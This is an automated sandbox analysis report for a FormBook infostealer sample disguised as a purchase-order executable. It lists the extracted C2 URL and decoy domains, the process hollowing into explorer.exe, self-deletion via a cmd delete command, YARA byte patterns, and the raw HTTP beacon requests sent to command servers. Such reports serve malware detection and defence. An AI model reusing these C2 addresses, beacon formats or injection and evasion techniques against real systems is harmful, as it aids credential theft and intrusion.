Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO 56720012359.exe

Overview

General Information

Sample Name:PO 56720012359.exe
Analysis ID:483537
MD5:839c75a88734aaf014ef0c3d77ce9109
SHA1:10d79cb8e51fd30bfff63b2465ba0e111f6dd500
SHA256:1829af596150521350d812c07f81226755d397e4755f649e083cc06de7d6f402
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • PO 56720012359.exe (PID: 2600 cmdline: 'C:\Users\user\Desktop\PO 56720012359.exe' MD5: 839C75A88734AAF014EF0C3D77CE9109)
    • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO 56720012359.exe (PID: 1392 cmdline: 'C:\Users\user\Desktop\PO 56720012359.exe' MD5: 839C75A88734AAF014EF0C3D77CE9109)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6300 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6324 cmdline: /c del 'C:\Users\user\Desktop\PO 56720012359.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.allfyllofficial.com/b6cu/"], "decoy": ["sxdiyan.com", "web0084.com", "cpafirmspokane.com", "la-bio-geo.com", "chacrit.com", "stuntfighting.com", "rjsworkshop.com", "themillennialsfinest.com", "thefrontrealestate.com", "chairmn.com", "best1korea.com", "gudssutu.icu", "backupchip.net", "shrikanthamimports.com", "sportrecoverysleeve.com", "healthy-shack.com", "investperwear.com", "intertradeperu.com", "resonantonshop.com", "greghugheslaw.com", "instrumentum.store", "creative-cloud.info", "sansfoundations.com", "pmca.asia", "night.doctor", "19v5.com", "cmas.life", "yhanlikho.com", "kartikpatelrealtor.com", "viralpagi.com", "samsonengineeringco.com", "mh666.cool", "laboratoriosjj.com", "produklokal.com", "tjhysb.com", "solutions-oigroup.com", "chictarh.com", "gotmail.info", "yourvalue.online", "mylinkreview.com", "champonpowerequipment.com", "starcoupeownersindonesia.com", "buzagialtligi.com", "botol2-lasdnk.com", "blunss.info", "l3-construction.com", "fmodesign.com", "silkraga.com", "editimpact.com", "unionairjordanla.com", "lacageavin.com", "gushixiu.com", "cleanlast.com", "awvpvkmzxa.com", "xiaosandao.com", "nldcostmetics.com", "prosperitywithsoul.com", "kheticulture.com", "booksbykimberlyeandco.com", "creativehughes.com", "mobilewz.com", "arerasols.com", "w-hanaemi-personal.com", "dynamonetwork.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xa83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x66c9:$sqlite3step: 68 34 1C 7B E1
    • 0x67dc:$sqlite3step: 68 34 1C 7B E1
    • 0x66f8:$sqlite3text: 68 38 2A 90 C5
    • 0x681d:$sqlite3text: 68 38 2A 90 C5
    • 0x670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6833:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 22 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.PO 56720012359.exe.2d10000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.PO 56720012359.exe.2d10000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.PO 56720012359.exe.2d10000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        3.2.PO 56720012359.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.PO 56720012359.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.allfyllofficial.com/b6cu/"], "decoy": ["sxdiyan.com", "web0084.com", "cpafirmspokane.com", "la-bio-geo.com", "chacrit.com", "stuntfighting.com", "rjsworkshop.com", "themillennialsfinest.com", "thefrontrealestate.com", "chairmn.com", "best1korea.com", "gudssutu.icu", "backupchip.net", "shrikanthamimports.com", "sportrecoverysleeve.com", "healthy-shack.com", "investperwear.com", "intertradeperu.com", "resonantonshop.com", "greghugheslaw.com", "instrumentum.store", "creative-cloud.info", "sansfoundations.com", "pmca.asia", "night.doctor", "19v5.com", "cmas.life", "yhanlikho.com", "kartikpatelrealtor.com", "viralpagi.com", "samsonengineeringco.com", "mh666.cool", "laboratoriosjj.com", "produklokal.com", "tjhysb.com", "solutions-oigroup.com", "chictarh.com", "gotmail.info", "yourvalue.online", "mylinkreview.com", "champonpowerequipment.com", "starcoupeownersindonesia.com", "buzagialtligi.com", "botol2-lasdnk.com", "blunss.info", "l3-construction.com", "fmodesign.com", "silkraga.com", "editimpact.com", "unionairjordanla.com", "lacageavin.com", "gushixiu.com", "cleanlast.com", "awvpvkmzxa.com", "xiaosandao.com", "nldcostmetics.com", "prosperitywithsoul.com", "kheticulture.com", "booksbykimberlyeandco.com", "creativehughes.com", "mobilewz.com", "arerasols.com", "w-hanaemi-personal.com", "dynamonetwork.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO 56720012359.exeVirustotal: Detection: 50%Perma Link
          Source: PO 56720012359.exeReversingLabs: Detection: 40%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: www.allfyllofficial.com/b6cu/Avira URL Cloud: Label: malware
          Source: 1.2.PO 56720012359.exe.2d10000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.PO 56720012359.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO 56720012359.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PO 56720012359.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: PO 56720012359.exe, 00000003.00000002.330426042.0000000003350000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO 56720012359.exe, 00000001.00000003.249848116.0000000002D80000.00000004.00000001.sdmp, PO 56720012359.exe, 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, cscript.exe, 00000010.00000003.329208174.0000000005160000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO 56720012359.exe, cscript.exe
          Source: Binary string: cscript.pdb source: PO 56720012359.exe, 00000003.00000002.330426042.0000000003350000.00000040.00020000.sdmp

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 107.180.44.148:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 107.180.44.148:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 107.180.44.148:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49783 -> 50.87.144.47:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49783 -> 50.87.144.47:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49783 -> 50.87.144.47:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 156.252.96.170 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.fmodesign.com
          Source: C:\Windows\explorer.exeDomain query: www.healthy-shack.com
          Source: C:\Windows\explorer.exeDomain query: www.arerasols.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.81.100.18 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.44.148 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mobilewz.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.252.68.226 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.stuntfighting.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.allfyllofficial.com/b6cu/
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: global trafficHTTP traffic detected: GET /b6cu/?y2=_npT80v0M2&L8fhOFRP=0cNTwCf3GfppWKB0T1XESIgtEFKjNX2tylJLJaVzm8N2XRqnUHRn8w7/tpdMCfw1z2P+ HTTP/1.1Host: www.stuntfighting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b6cu/?L8fhOFRP=v4/7wB6X+ne64BMfzkTnNfrtxR+fNWuSRi8sP9TYFcLz2AIA8KGD8NWIHbMwW3JjWqpf&y2=_npT80v0M2 HTTP/1.1Host: www.fmodesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b6cu/?y2=_npT80v0M2&L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz HTTP/1.1Host: www.healthy-shack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Sep 2021 06:36:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/High_Speed_Internet.cfm?domain=allfyllofficial.com&fp=CDQ1BUiKVEwbYLN
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/Parental_Control.cfm?domain=allfyllofficial.com&fp=CDQ1BUiKVEwbYLNmNk
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/display.cfm
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/px.js?ch=1
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/px.js?ch=2
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/sk-logabpstatus.php?a=NXM3Y25kMzZuSzNqUXBxY0xQbmloMGRRSnhhT3VRc1EvRkt
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.2
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/libg.png)
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/logo.png)
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: cscript.exe, 00000010.00000002.508876093.0000000003683000.00000004.00000020.sdmpString found in binary or memory: http://www.mobilewz.com/
          Source: cscript.exe, 00000010.00000002.508876093.0000000003683000.00000004.00000020.sdmpString found in binary or memory: http://www.mobilewz.com/user
          Source: cscript.exe, 00000010.00000002.508876093.0000000003683000.00000004.00000020.sdmpString found in binary or memory: http://www.mobilewz.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=hpZKB5Wc2v3dAucjERLG4WeGvlE/NyvmoCIino6AurWFNcX
          Source: unknownDNS traffic detected: queries for: www.stuntfighting.com
          Source: global trafficHTTP traffic detected: GET /b6cu/?y2=_npT80v0M2&L8fhOFRP=0cNTwCf3GfppWKB0T1XESIgtEFKjNX2tylJLJaVzm8N2XRqnUHRn8w7/tpdMCfw1z2P+ HTTP/1.1Host: www.stuntfighting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b6cu/?L8fhOFRP=v4/7wB6X+ne64BMfzkTnNfrtxR+fNWuSRi8sP9TYFcLz2AIA8KGD8NWIHbMwW3JjWqpf&y2=_npT80v0M2 HTTP/1.1Host: www.fmodesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b6cu/?y2=_npT80v0M2&L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz HTTP/1.1Host: www.healthy-shack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
